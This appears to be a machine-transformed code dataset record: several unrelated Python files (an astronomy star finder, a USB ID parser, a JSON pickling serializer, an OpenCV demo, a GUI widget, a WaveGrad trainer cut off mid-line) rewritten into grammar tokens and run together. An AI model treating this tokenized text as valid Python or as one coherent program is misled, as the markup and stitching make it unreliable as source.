# Licensed under a 3-clause BSD style license - see LICENSE.rst """ This module implements the IRAFStarFinder class. """<import_stmt>inspect<import_stmt>warnings<import_from_stmt>astropy.nddata extract_array<import_from_stmt>astropy.table QTable<import_from_stmt>astropy.utils lazyproperty<import_stmt>numpy<as>np<import_from_stmt>.core StarFinderBase _StarFinderKernel<import_from_stmt>..utils._convolution _filter_data<import_from_stmt>..utils._misc _get_version_info<import_from_stmt>..utils._moments _moments _moments_central<import_from_stmt>..utils.exceptions NoDetectionsWarning<line_sep>__all__=['IRAFStarFinder']<class_stmt>IRAFStarFinder(StarFinderBase)<block_start>""" Detect stars in an image using IRAF's "starfind" algorithm. `IRAFStarFinder` searches images for local density maxima that have a peak amplitude greater than ``threshold`` above the local background and have a PSF full-width at half-maximum similar to the input ``fwhm``. The objects' centroid, roundness (ellipticity), and sharpness are calculated using image moments. Parameters ---------- threshold : float The absolute image value above which to select sources. fwhm : float The full-width half-maximum (FWHM) of the 2D circular Gaussian kernel in units of pixels. minsep_fwhm : float, optional The minimum separation for detected objects in units of ``fwhm``. sigma_radius : float, optional The truncation radius of the Gaussian kernel in units of sigma (standard deviation) [``1 sigma = FWHM / 2.0*sqrt(2.0*log(2.0))``]. sharplo : float, optional The lower bound on sharpness for object detection. sharphi : float, optional The upper bound on sharpness for object detection. roundlo : float, optional The lower bound on roundness for object detection. roundhi : float, optional The upper bound on roundness for object detection. sky : float, optional The background sky level of the image. Inputing a ``sky`` value will override the background sky estimate. Setting ``sky`` affects only the output values of the object ``peak``, ``flux``, and ``mag`` values. The default is ``None``, which means the sky value will be estimated using the `starfind`_ method. exclude_border : bool, optional Set to `True` to exclude sources found within half the size of the convolution kernel from the image borders. The default is `False`, which is the mode used by `starfind`_. brightest : int, None, optional Number of brightest objects to keep after sorting the full object list. If ``brightest`` is set to `None`, all objects will be selected. peakmax : float, None, optional Maximum peak pixel value in an object. Only objects whose peak pixel values are *strictly smaller* than ``peakmax`` will be selected. This may be used to exclude saturated sources. By default, when ``peakmax`` is set to `None`, all objects will be selected. .. warning:: `IRAFStarFinder` automatically excludes objects whose peak pixel values are negative. Therefore, setting ``peakmax`` to a non-positive value would result in exclusion of all objects. xycoords : `None` or Nx2 `~numpy.ndarray` The (x, y) pixel coordinates of the approximate centroid positions of identified sources. If ``xycoords`` are input, the algorithm will skip the source-finding step. Notes ----- For the convolution step, this routine sets pixels beyond the image borders to 0.0. The equivalent parameters in IRAF's `starfind`_ are ``boundary='constant'`` and ``constant=0.0``. IRAF's `starfind`_ uses ``hwhmpsf``, ``fradius``, and ``sepmin`` as input parameters. The equivalent input values for `IRAFStarFinder` are: * ``fwhm = hwhmpsf * 2`` * ``sigma_radius = fradius * sqrt(2.0*log(2.0))`` * ``minsep_fwhm = 0.5 * sepmin`` The main differences between `~photutils.detection.DAOStarFinder` and `~photutils.detection.IRAFStarFinder` are: * `~photutils.detection.IRAFStarFinder` always uses a 2D circular Gaussian kernel, while `~photutils.detection.DAOStarFinder` can use an elliptical Gaussian kernel. * `~photutils.detection.IRAFStarFinder` calculates the objects' centroid, roundness, and sharpness using image moments. See Also -------- DAOStarFinder References ---------- .. [1] https://iraf.net/irafhelp.php?val=starfind .. _starfind: https://iraf.net/irafhelp.php?val=starfind """<def_stmt>__init__ self threshold fwhm sigma_radius=1.5 minsep_fwhm=2.5 sharplo=0.5 sharphi=2.0 roundlo=0.0 roundhi=0.2 sky=<none> exclude_border=<false> brightest=<none> peakmax=<none> xycoords=<none><block_start><if_stmt><not>np.isscalar(threshold)<block_start><raise>TypeError('threshold must be a scalar value.')<block_end><if_stmt><not>np.isscalar(fwhm)<block_start><raise>TypeError('fwhm must be a scalar value.')<block_end>self.threshold=threshold<line_sep>self.fwhm=fwhm<line_sep>self.sigma_radius=sigma_radius<line_sep>self.minsep_fwhm=minsep_fwhm<line_sep>self.sharplo=sharplo<line_sep>self.sharphi=sharphi<line_sep>self.roundlo=roundlo<line_sep>self.roundhi=roundhi<line_sep>self.sky=sky<line_sep>self.exclude_border=exclude_border<line_sep>self.brightest=self._validate_brightest(brightest)<line_sep>self.peakmax=peakmax<if_stmt>xycoords<is><not><none><block_start>xycoords=np.asarray(xycoords)<if_stmt>xycoords.ndim<ne>2<or>xycoords.shape[1]<ne>2<block_start><raise>ValueError('xycoords must be shaped as a Nx2 array')<block_end><block_end>self.xycoords=xycoords<line_sep>self.kernel=_StarFinderKernel(self.fwhm ratio=1.0 theta=0.0 sigma_radius=self.sigma_radius)<line_sep>self.min_separation=max(2 int((self.fwhm<times>self.minsep_fwhm)+0.5))<block_end>@staticmethod<def_stmt>_validate_brightest brightest<block_start><if_stmt>brightest<is><not><none><block_start><if_stmt>brightest<le>0<block_start><raise>ValueError('brightest must be >= 0')<block_end>bright_int=int(brightest)<if_stmt>bright_int<ne>brightest<block_start><raise>ValueError('brightest must be an integer')<block_end>brightest=bright_int<block_end><return>brightest<block_end><def_stmt>_get_raw_catalog self data mask=<none><block_start>convolved_data=_filter_data(data self.kernel.data mode='constant' fill_value=0.0 check_normalization=<false>)<if_stmt>self.xycoords<is><none><block_start>xypos=self._find_stars(convolved_data self.kernel self.threshold min_separation=self.min_separation mask=mask exclude_border=self.exclude_border)<block_end><else_stmt><block_start>xypos=self.xycoords<block_end><if_stmt>xypos<is><none><block_start>warnings.warn('No sources were found.' NoDetectionsWarning)<line_sep><return><none><block_end>cat=_IRAFStarFinderCatalog(data convolved_data xypos self.kernel sky=self.sky sharplo=self.sharplo sharphi=self.sharphi roundlo=self.roundlo roundhi=self.roundhi brightest=self.brightest peakmax=self.peakmax)<line_sep><return>cat<block_end><def_stmt>find_stars self data mask=<none><block_start>""" Find stars in an astronomical image. Parameters ---------- data : 2D array_like The 2D image array. mask : 2D bool array, optional A boolean mask with the same shape as ``data``, where a `True` value indicates the corresponding element of ``data`` is masked. Masked pixels are ignored when searching for stars. Returns ------- table : `~astropy.table.QTable` or `None` A table of found objects with the following parameters: * ``id``: unique object identification number. * ``xcentroid, ycentroid``: object centroid. * ``fwhm``: object FWHM. * ``sharpness``: object sharpness. * ``roundness``: object roundness. * ``pa``: object position angle (degrees counter clockwise from the positive x axis). * ``npix``: the total number of (positive) unmasked pixels. * ``sky``: the local ``sky`` value. * ``peak``: the peak, sky-subtracted, pixel value of the object. * ``flux``: the object instrumental flux. * ``mag``: the object instrumental magnitude calculated as ``-2.5 * log10(flux)``. `None` is returned if no stars are found. """<line_sep>cat=self._get_raw_catalog(data mask=mask)<if_stmt>cat<is><none><block_start><return><none><block_end># apply all selection filters cat=cat.apply_all_filters()<if_stmt>cat<is><none><block_start><return><none><block_end># create the output table <return>cat.to_table()<block_end><block_end><class_stmt>_IRAFStarFinderCatalog<block_start>""" Class to create a catalog of the properties of each detected star, as defined by IRAF's ``starfind`` task. Parameters ---------- data : 2D `~numpy.ndarray` The 2D image. convolved_data : 2D `~numpy.ndarray` The convolved 2D image. xypos: Nx2 `numpy.ndarray` A Nx2 array of (x, y) pixel coordinates denoting the central positions of the stars. kernel : `_StarFinderKernel` The convolution kernel. This kernel must match the kernel used to create the ``convolved_data``. sky : `None` or float, optional The local sky level around the source. If sky is ``None``, then a local sky level will be (crudely) estimated using the IRAF ``starfind`` calculation. """<def_stmt>__init__ self data convolved_data xypos kernel sky=<none> sharplo=0.2 sharphi=1.0 roundlo=-1.0 roundhi=1.0 brightest=<none> peakmax=<none><block_start>self.data=data<line_sep>self.convolved_data=convolved_data<line_sep>self.xypos=xypos<line_sep>self.kernel=kernel<line_sep>self._sky=sky<line_sep>self.sharplo=sharplo<line_sep>self.sharphi=sharphi<line_sep>self.roundlo=roundlo<line_sep>self.roundhi=roundhi<line_sep>self.brightest=brightest<line_sep>self.peakmax=peakmax<line_sep>self.id=np.arange(len(self))+1<line_sep>self.cutout_shape=kernel.shape<line_sep>self.default_columns=('id' 'xcentroid' 'ycentroid' 'fwhm' 'sharpness' 'roundness' 'pa' 'npix' 'sky' 'peak' 'flux' 'mag')<block_end><def_stmt>__len__ self<block_start><return>len(self.xypos)<block_end><def_stmt>__getitem__ self index<block_start>newcls=object.__new__(self.__class__)<line_sep>init_attr=('data' 'convolved_data' 'kernel' '_sky' 'sharplo' 'sharphi' 'roundlo' 'roundhi' 'brightest' 'peakmax' 'cutout_shape' 'default_columns')<for_stmt>attr init_attr<block_start>setattr(newcls attr getattr(self attr))<block_end># xypos determines ordering and isscalar # NOTE: always keep as a 2D array, even for a single source attr='xypos'<line_sep>value=getattr(self attr)[index]<line_sep>setattr(newcls attr np.atleast_2d(value))<line_sep>keys=set(self.__dict__.keys())&set(self._lazyproperties)<line_sep>keys.add('id')<for_stmt>key keys<block_start>value=self.__dict__[key]<line_sep># do not insert lazy attributes that are always scalar (e.g., # isscalar), i.e., not an array/list for each source <if_stmt>np.isscalar(value)<block_start><continue><block_end># value is always at least a 1D array, even for a single source value=np.atleast_1d(value[index])<line_sep>newcls.__dict__[key]=value<block_end><return>newcls<block_end>@lazyproperty<def_stmt>isscalar self<block_start>""" Whether the instance is scalar (e.g., a single source). """<line_sep><return>self.xypos.shape<eq>(1 2)<block_end>@property<def_stmt>_lazyproperties self<block_start>""" Return all lazyproperties (even in superclasses). """<def_stmt>islazyproperty obj<block_start><return>isinstance(obj lazyproperty)<block_end><return>[i[0]<for>i inspect.getmembers(self.__class__ predicate=islazyproperty)]<block_end><def_stmt>reset_ids self<block_start>"""Reset the ID column to be consecutive integers."""<line_sep>self.id=np.arange(len(self))+1<block_end>@lazyproperty<def_stmt>sky self<block_start><if_stmt>self._sky<is><none><block_start>skymask=~self.kernel.mask.astype(bool)# 1=sky, 0=obj nsky=np.count_nonzero(skymask)<line_sep>axis=(1 2)<if_stmt>nsky<eq>0.<block_start>sky=(np.max(self.cutout_data_nosub axis=axis)-np.max(self.cutout_convdata axis=axis))<block_end><else_stmt><block_start>sky=(np.sum(self.cutout_data_nosub<times>skymask axis=axis)/nsky)<block_end><block_end><else_stmt><block_start>sky=np.full(len(self) fill_value=self._sky)<block_end><return>sky<block_end><def_stmt>make_cutouts self data<block_start>cutouts=[]<for_stmt>xpos,ypos self.xypos<block_start>cutouts.append(extract_array(data self.cutout_shape (ypos xpos) fill_value=0.0))<block_end><return>np.array(cutouts)<block_end>@lazyproperty<def_stmt>cutout_data_nosub self<block_start><return>self.make_cutouts(self.data)<block_end>@lazyproperty<def_stmt>cutout_data self<block_start>data=((self.cutout_data_nosub-self.sky[: np.newaxis np.newaxis])<times>self.kernel.mask)<line_sep># IRAF starfind discards negative pixels data[data<l>0]=0.0<line_sep><return>data<block_end>@lazyproperty<def_stmt>cutout_convdata self<block_start><return>self.make_cutouts(self.convolved_data)<block_end>@lazyproperty<def_stmt>npix self<block_start><return>np.count_nonzero(self.cutout_data axis=(1 2))<block_end>@lazyproperty<def_stmt>moments self<block_start><return>np.array([_moments(arr order=1)<for>arr self.cutout_data])<block_end>@lazyproperty<def_stmt>cutout_centroid self<block_start>moments=self.moments<line_sep># ignore divide-by-zero RuntimeWarning <with_stmt>warnings.catch_warnings()<block_start>warnings.simplefilter('ignore' RuntimeWarning)<line_sep>ycentroid=moments[: 1 0]/moments[: 0 0]<line_sep>xcentroid=moments[: 0 1]/moments[: 0 0]<block_end><return>np.transpose((ycentroid xcentroid))<block_end>@lazyproperty<def_stmt>cutout_xcentroid self<block_start><return>np.transpose(self.cutout_centroid)[1]<block_end>@lazyproperty<def_stmt>cutout_ycentroid self<block_start><return>np.transpose(self.cutout_centroid)[0]<block_end>@lazyproperty<def_stmt>cutout_xorigin self<block_start><return>np.transpose(self.xypos)[0]-self.kernel.xradius<block_end>@lazyproperty<def_stmt>cutout_yorigin self<block_start><return>np.transpose(self.xypos)[1]-self.kernel.yradius<block_end>@lazyproperty<def_stmt>xcentroid self<block_start><return>self.cutout_xcentroid+self.cutout_xorigin<block_end>@lazyproperty<def_stmt>ycentroid self<block_start><return>self.cutout_ycentroid+self.cutout_yorigin<block_end>@lazyproperty<def_stmt>peak self<block_start><return>np.array([np.max(arr)<for>arr self.cutout_data])<block_end>@lazyproperty<def_stmt>flux self<block_start><return>np.array([np.sum(arr)<for>arr self.cutout_data])<block_end>@lazyproperty<def_stmt>mag self<block_start><return>-2.5<times>np.log10(self.flux)<block_end>@lazyproperty<def_stmt>moments_central self<block_start>moments=np.array([_moments_central(arr center=(xcen_ ycen_) order=2)<for>arr,xcen_,ycen_ zip(self.cutout_data self.cutout_xcentroid self.cutout_ycentroid)])<line_sep><return>moments/self.moments[: 0 0][: np.newaxis np.newaxis]<block_end>@lazyproperty<def_stmt>mu_sum self<block_start><return>self.moments_central[: 0 2]+self.moments_central[: 2 0]<block_end>@lazyproperty<def_stmt>mu_diff self<block_start><return>self.moments_central[: 0 2]-self.moments_central[: 2 0]<block_end>@lazyproperty<def_stmt>fwhm self<block_start><return>2.0<times>np.sqrt(np.log(2.0)<times>self.mu_sum)<block_end>@lazyproperty<def_stmt>roundness self<block_start><return>np.sqrt(self.mu_diff<power>2+4.0<times>self.moments_central[: 1 1]<power>2)/self.mu_sum<block_end>@lazyproperty<def_stmt>sharpness self<block_start><return>self.fwhm/self.kernel.fwhm<block_end>@lazyproperty<def_stmt>pa self<block_start>pa=np.rad2deg(0.5<times>np.arctan2(2.0<times>self.moments_central[: 1 1] self.mu_diff))<line_sep>pa=np.where(pa<l>0 pa+180 pa)<line_sep><return>pa<block_end><def_stmt>apply_filters self<block_start>"""Filter the catalog."""<line_sep>mask=np.count_nonzero(self.cutout_data axis=(1 2))<g>1<line_sep>mask<augand>((self.sharpness<g>self.sharplo)&(self.sharpness<l>self.sharphi)&(self.roundness<g>self.roundlo)&(self.roundness<l>self.roundhi))<if_stmt>self.peakmax<is><not><none><block_start>mask<augand>(self.peak<l>self.peakmax)<block_end>newcat=self[mask]<if_stmt>len(newcat)<eq>0<block_start>warnings.warn('Sources were found, but none pass the sharpness, '<concat>'roundness, or peakmax criteria' NoDetectionsWarning)<line_sep><return><none><block_end><return>newcat<block_end><def_stmt>select_brightest self<block_start>""" Sort the catalog by the brightest fluxes and select the top brightest sources. """<line_sep>newcat=self<if_stmt>self.brightest<is><not><none><block_start>idx=np.argsort(self.flux)[::-1][:self.brightest]<line_sep>newcat=self[idx]<block_end><return>newcat<block_end><def_stmt>apply_all_filters self<block_start>""" Apply all filters, select the brightest, and reset the source ids. """<line_sep>cat=self.apply_filters()<if_stmt>cat<is><none><block_start><return><none><block_end>cat=cat.select_brightest()<line_sep>cat.reset_ids()<line_sep><return>cat<block_end><def_stmt>to_table self columns=<none><block_start>meta={'version':_get_version_info()}<line_sep>table=QTable(meta=meta)<if_stmt>columns<is><none><block_start>columns=self.default_columns<block_end><for_stmt>column columns<block_start>table[column]=getattr(self column)<block_end><return>table<block_end><block_end>
<import_stmt>re<def_stmt>parseDeviceId id<block_start>match=re.search('(#|\\\\)vid_([a-f0-9]{4})&pid_([a-f0-9]{4})(&|#|\\\\)' id re.IGNORECASE)<line_sep><return>[int(match.group(i) 16)<if>match<else><none><for>i [2 3]]<block_end>
# Copyright 2015 Ufora Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """JsonPickle A simplified form of 'pickle' that only pickles ComputedGraph locations and 'simple' python objects (e.g. those for whom eval(repr(x)) == x). In this case, we don't pickle to a string - we pickle to 'simple' python objects, which are very close to json. """<import_stmt>sys<class_stmt>Pickleable(object)<block_start>"""Mixin class to indicate that a class supports JsonPickle serialization. Classes must expose methods __reduce__(self): return (cls, ({..kwds},)) we will then call cls(**kwds) to inflate. cls must descend from 'Pickleable'. By default, we just use the dict of the object and its own type """<def_stmt>__reduce__ self<block_start><return>(type(self) (self.__dict__ ))<block_end><block_end>#set of other classes we are allowed to unpickle. Mostly to allow for boost::python #classes, which can't easily descend from 'Pickleable' unpickleWhitelist_=set()<def_stmt>addClassToPickleWhitelist cls<block_start>"""Add a class that doesn't descend from Pickleable to the pickle whitelist"""<line_sep>unpickleWhitelist_.add(cls)<block_end>ENCODING_OBJECT='o'<line_sep>ENCODING_SIMPLE_PYTHON='P'<line_sep>ENCODING_UNICODE='u'<line_sep>ENCODING_INT='i'<line_sep>ENCODING_LONG='l'<line_sep>ENCODING_TUPLE='()'<line_sep>ENCODING_LIST='[]'<line_sep>ENCODING_DICT='{}'<line_sep>#a dictionary from string to ComputedGraph.Location subclasses locationTypes_={}<line_sep>#a dictionary from a ComputedGraph type to a key that can be used in place of the usual #(clsModule, clsName) pair locationTypeOverrides_={}<def_stmt>addOverride cls override<block_start>"""Override the serializer to use 'override' as the identifier for instances of 'cls' This is primarily to shorted the amount of data in the representation and to allow the representation to remain constant even if classes are moving around or changing names. override may not be a tuple """<assert_stmt>cls<not><in>locationTypeOverrides_<assert_stmt><not>isinstance(override tuple)<line_sep>locationTypeOverrides_[cls]=override<line_sep>locationTypes_[override]=cls<block_end><def_stmt>addClassAlias cls override<block_start>locationTypes_[override]=cls<block_end><def_stmt>classFromModuleAndName clsModuleAndName<block_start><if_stmt>clsModuleAndName<in>locationTypeOverrides_<block_start><return>locationTypeOverrides_[clsModuleAndName]<block_end><if_stmt>clsModuleAndName<not><in>locationTypes_<block_start>__import__(clsModuleAndName[0])<try_stmt><block_start>module=sys.modules[clsModuleAndName[0]]<block_end><except_stmt>KeyError<block_start><raise>UserWarning("Couldn't import module %s" clsModuleAndName[0])<block_end><try_stmt><block_start>cls=module.__dict__[clsModuleAndName[1]]<block_end><except_stmt>KeyError<block_start><raise>UserWarning("Can't find %s in %s"%(clsModuleAndName[1] module.__name__))<block_end><if_stmt><not>issubclass(cls Pickleable)<and>cls<not><in>unpickleWhitelist_<block_start><raise>UserWarning("%s is not a computed graph location type"%clsModuleAndName)<block_end>locationTypes_[clsModuleAndName]=cls<block_end><return>locationTypes_[clsModuleAndName]<block_end><def_stmt>toSimple complexObject<block_start><if_stmt>complexObject<is><none><block_start><return>(ENCODING_SIMPLE_PYTHON <none>)<block_end><if_stmt>isinstance(complexObject (float str bool))<block_start><return>(ENCODING_SIMPLE_PYTHON complexObject)<block_end><if_stmt>isinstance(complexObject int)<block_start><return>(ENCODING_INT str(complexObject))<block_end><if_stmt>isinstance(complexObject long)<block_start><return>(ENCODING_LONG str(complexObject))<block_end><if_stmt>isinstance(complexObject unicode)<block_start><return>(ENCODING_UNICODE complexObject.encode('utf-8'))<block_end><if_stmt>isinstance(complexObject tuple)<block_start>subs=[]<line_sep>allArePurePython=<true><for_stmt>x complexObject<block_start>encoding,simpleForm=toSimple(x)<if_stmt>encoding<ne>ENCODING_SIMPLE_PYTHON<block_start>allArePurePython=<false><block_end>subs.append((encoding simpleForm))<block_end><if_stmt>allArePurePython<block_start><return>(ENCODING_SIMPLE_PYTHON complexObject)<block_end><return>(ENCODING_TUPLE tuple(subs))<block_end><if_stmt>isinstance(complexObject list)<block_start>subs=[]<line_sep><return>(ENCODING_LIST tuple([toSimple(x)<for>x complexObject]))<block_end><if_stmt>isinstance(complexObject dict)<block_start>subs=[]<for_stmt>key,val complexObject.iteritems()<block_start>keyEncoded=toSimple(key)<line_sep>valEncoded=toSimple(val)<line_sep>subs.append((keyEncoded valEncoded))<block_end><return>(ENCODING_DICT tuple(sorted(subs)))<block_end><try_stmt><block_start>cls,args=complexObject.__reduce__()<block_end><except_stmt><block_start><raise>UserWarning("Couldn't call __reduce__ on %s" complexObject)<block_end><if_stmt>cls<in>locationTypeOverrides_<block_start>clsKey=locationTypeOverrides_[cls]<block_end><else_stmt><block_start>clsKey=(cls.__module__ cls.__name__)<block_end><return>(ENCODING_OBJECT (clsKey toSimple(args[0])))<block_end><def_stmt>toComplex simpleObject<block_start>"""Convert 'x' from a simplified form to the full CG form."""<if_stmt>simpleObject[0]<eq>ENCODING_SIMPLE_PYTHON<block_start><return>simpleObject[1]<block_end><if_stmt>simpleObject[0]<eq>ENCODING_INT<block_start><return>int(simpleObject[1])<block_end><if_stmt>simpleObject[0]<eq>ENCODING_UNICODE<block_start><return>unicode(simpleObject[1] 'utf-8')<block_end><if_stmt>simpleObject[0]<eq>ENCODING_LONG<block_start><return>long(simpleObject[1])<block_end><if_stmt>simpleObject[0]<eq>ENCODING_TUPLE<block_start><return>tuple([toComplex(x)<for>x simpleObject[1]])<block_end><if_stmt>simpleObject[0]<eq>ENCODING_LIST<block_start><return>[toComplex(x)<for>x simpleObject[1]]<block_end><if_stmt>simpleObject[0]<eq>ENCODING_DICT<block_start><return>dict((toComplex(k) toComplex(v))<for>k,v simpleObject[1])<block_end><elif_stmt>simpleObject[0]<eq>ENCODING_OBJECT<block_start>clsModuleAndName=simpleObject[1][0]<line_sep>args=simpleObject[1][1]<line_sep>cls=classFromModuleAndName(clsModuleAndName)<line_sep>kwds=toComplex(args)<try_stmt><block_start><return>cls(**kwds)<block_end><except_stmt><block_start><raise>UserWarning("Failed to construct instance of %s with %s"%(cls kwds))<block_end><block_end><raise>UserWarning("Badly encoded object")<block_end><import_stmt>ufora.native.Json<as>JsonNative<def_stmt>toJson complexObject<block_start><return>JsonNative.Json.fromSimple(toSimple(complexObject))<block_end><def_stmt>fromJson jsonForm<block_start><return>toComplex(jsonForm.toSimple())<block_end>
<import_stmt>cv2<import_stmt>numpy<as>np<line_sep># Capture the input frame <def_stmt>get_frame cap scaling_factor=0.5<block_start>ret,frame=cap.read()<line_sep># Resize the frame frame=cv2.resize(frame <none> fx=scaling_factor fy=scaling_factor interpolation=cv2.INTER_AREA)<line_sep><return>frame<block_end><if_stmt>__name__<eq>'__main__'# Initialize the video capture object <block_start>cap=cv2.VideoCapture(1)<line_sep># Create the background subtractor object bgSubtractor=cv2.createBackgroundSubtractorMOG2()<line_sep># This factor controls the learning rate of the algorithm. # The learning rate refers to the rate at which your model # will learn about the background. Higher value for # 'history' indicates a slower learning rate. You # can play with this parameter to see how it affects # the output. history=100<line_sep># Iterate until the user presses the ESC key <while_stmt><true><block_start>frame=get_frame(cap 0.5)<line_sep># Apply the background subtraction model to the input frame mask=bgSubtractor.apply(frame learningRate=1.0/history)<line_sep># Convert from grayscale to 3-channel RGB mask=cv2.cvtColor(mask cv2.COLOR_GRAY2BGR)<line_sep>cv2.imshow('Input frame' frame)<line_sep>cv2.imshow('Moving Objects MOG' mask&frame)<line_sep># Check if the user pressed the ESC key c=cv2.waitKey(delay=30)<if_stmt>c<eq>27<block_start><break><block_end><block_end>cap.release()<line_sep>cv2.destroyAllWindows()<block_end>
<import_from_stmt>travertino.size at_least<import_from_stmt>toga_cocoa.libs SEL NSPopUpButton objc_method<import_from_stmt>.base Widget<class_stmt>TogaPopupButton(NSPopUpButton)<block_start>@objc_method<def_stmt>onSelect_ self obj<arrow><none><block_start><if_stmt>self.interface.on_select<block_start>self.interface.on_select(self.interface)<block_end><block_end><block_end><class_stmt>Selection(Widget)<block_start><def_stmt>create self<block_start>self.native=TogaPopupButton.alloc().init()<line_sep>self.native.interface=self.interface<line_sep>self.native.target=self.native<line_sep>self.native.action=SEL('onSelect:')<line_sep>self.add_constraints()<block_end><def_stmt>rehint self<block_start>content_size=self.native.intrinsicContentSize()<line_sep>self.interface.intrinsic.height=content_size.height<line_sep>self.interface.intrinsic.width=at_least(max(self.interface.MIN_WIDTH content_size.width))<block_end><def_stmt>remove_all_items self<block_start>self.native.removeAllItems()<block_end><def_stmt>add_item self item<block_start>self.native.addItemWithTitle(item)<block_end><def_stmt>select_item self item<block_start>self.native.selectItemWithTitle(item)<block_end><def_stmt>get_selected_item self<block_start><return>str(self.native.titleOfSelectedItem)<block_end><def_stmt>set_on_select self handler<block_start><pass><block_end><block_end>
# Copyright 2020 LMNT, Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== <import_stmt>numpy<as>np<import_stmt>os<import_stmt>torch<import_stmt>torch.nn<as>nn<import_from_stmt>torch.nn.parallel DistributedDataParallel<import_from_stmt>torch.utils.tensorboard SummaryWriter<import_from_stmt>tqdm tqdm<import_from_stmt>wavegrad.dataset from_path<as>dataset_from_path<import_from_stmt>wavegrad.model WaveGrad<def_stmt>_nested_map struct map_fn<block_start><if_stmt>isinstance(struct tuple)<block_start><return>tuple(_nested_map(x map_fn)<for>x struct)<block_end><if_stmt>isinstance(struct list)<block_start><return>[_nested_map(x map_fn)<for>x struct]<block_end><if_stmt>isinstance(struct dict)<block_start><return>{k:_nested_map(v map_fn)<for>k,v struct.items()}<block_end><return>map_fn(struct)<block_end><class_stmt>WaveGradLearner<block_start><def_stmt>__init__ self model_dir model dataset optimizer params *args **kwargs<block_start>os.makedirs(model_dir exist_ok=<true>)<line_sep>self.model_dir=model_dir<line_sep>self.model=model<line_sep>self.dataset=dataset<line_sep>self.optimizer=optimizer<line_sep>self.params=params<line_sep>self.autocast=torch.cuda.amp.autocast(enabled=kwargs.get('fp16' <false>))<line_sep>self.scaler=torch.cuda.amp.GradScaler(enabled=kwargs.get('fp16' <false>))<line_sep>self.step=0<line_sep>self.is_master=<true><line_sep>beta=np.array(self.params.noise_schedule)<line_sep>noise_level=np.cumprod(1-beta)<power>0.5<line_sep>noise_level=np.concatenate([[1.0] noise_level] axis=0)<line_sep>self.noise_level=torch.tensor(noise_level.astype(np.float32))<line_sep>self.loss_fn=nn.L1Loss()<line_sep>self.summary_writer=<none><block_end><def_stmt>state_dict self<block_start><if_stmt>hasattr(self.model 'module')<and>isinstance(self.model.module nn.Module)<block_start>model_state=self.model.module.state_dict()<block_end><else_stmt><block_start>model_state=self.model.state_dict()<block_end><return>{'step':self.step 'model':{k:v.cpu()<if>isinstance(v torch.Tensor)<else>v<for>k,v model_state.items()} 'optimizer':{k:v.cpu()<if>isinstance(v torch.Tensor)<else>v<for>k,v self.optimizer.state_dict().items()} 'params':dict(self.params) 'scaler':self.scaler.state_dict() }<block_end><def_stmt>load_state_dict self state_dict<block_start><if_stmt>hasattr(self.model 'module')<and>isinstance(self.model.module nn.Module)<block_start>self.model.module.load_state_dict(state_dict['model'])<block_end><else_stmt><block_start>self.model.load_state_dict(state_dict['model'])<block_end>self.optimizer.load_state_dict(state_dict['optimizer'])<line_sep>self.scaler.load_state_dict(state_dict['scaler'])<line_sep>self.step=state_dict['step']<block_end><def_stmt>save_to_checkpoint self filename='weights'<block_start>save_basename=f'{filename}-{self.step}.pt'<line_sep>save_name=f'{self.model_dir}/{save_basename}'<line_sep>link_name=f'{self.model_dir}/{filename}.pt'<line_sep>torch.save(self.state_dict() save_name)<if_stmt>os.name<eq>'nt'<block_start>torch.save(self.state_dict() link_name)<block_end><else_stmt><block_start><if_stmt>os.path.islink(link_name)<block_start>os.unlink(link_name)<block_end>os.symlink(save_basename link_name)<block_end><block_end><def_stmt>restore_from_checkpoint self filename='weights'<block_start><try_stmt><block_start>checkpoint=torch.load(f'{self.model_dir}/{filename}.pt')<line_sep>self.load_state_dict(checkpoint)<line_sep><return><true><block_end><except_stmt>FileNotFoundError<block_start><return><false><block_end><block_end><def_stmt>train self max_steps=<none><block_start>device=next(self.model.parameters()).device<while_stmt><true><block_start><for_stmt>features tqdm(self.dataset desc=f'Epoch {self.step<floordiv>len(self.dataset)}')<if>self.is_master<else>self.dataset<block_start><if_stmt>max_steps<is><not><none><and>self.step<ge>max_steps<block_start><return><block_end>features=_nested_map(features <lambda>x:x.to(device)<if>isinstance(x torch.Tensor)<else>x)<line_sep>loss=self.train_step(features)<if_stmt>torch.isnan(loss).any()<block_start><raise>RuntimeError(f'Detected NaN loss at step {self.step}.')<block_end><if_stmt>self.is_master<block_start><if_stmt>self.step%100<eq>0<block_start>self._write_summary(self.step features loss)<block_end><if_stmt>self.step%len(self.dataset)<eq>0<block_start>self.save_to_checkpoint()<block_end><block_end>self.step<augadd>1<block_end><block_end><block_end><def_stmt>train_step self features<block_start><for_stmt>param self.model.parameters()<block_start>param.grad=<none><block_end>audio=features['audio']<line_sep>spectrogram=features['spectrogram']<line_sep>N,T=audio.shape<line_sep>S=1000<line_sep>device=audio.device<line_sep>self.noise_level=self.noise_level.to(device)<with_stmt>self.autocast<block_start>s=torch.randint(1 S+1 [N] device=audio.device)<line_sep>l_a,l_b=self.noise_level[s-1] self.noise_level[s]<line_sep>noise_scale=l_a+torch.rand(N device=audio.device)<times>(l_b-l_a)<line_sep>noise_scale=noise_scale.unsqueeze(1)<line_sep>noise=torch.randn_like(audio)<line_sep>noisy_audio=noise_scale<times>audio+(1.0-noise_scale<power>2)<power>0.5<times>noise<line_sep>predicted=self.model(noisy_audio spectrogram noise_scale.squeeze(1))<line_sep>loss=self.loss_fn(noise predicted.squeeze(1))<block_end>self.scaler.scale(loss).backward()<line_sep>self.scaler.unscale_(self.optimizer)<line_sep>self.grad_norm=nn.utils.clip_grad_norm_(self.model.parameters() self.params.max_grad_norm)<line_sep>self.scaler.step(self.optimizer)<line_sep>self.scaler.update()<line_sep><return>loss<block_end><def_stmt>_write_summary self step features loss<block_start>writer=self.summary_writer<or>SummaryWriter(self.model_dir purge_step=step)<line_sep>writer.add_audio('audio/reference' features['audio'][0] step sample_rate=self.params.sample_rate)<line_sep>writer.add_scalar('train/loss' loss step)<line_sep>writer.add_scalar('train/grad_norm' 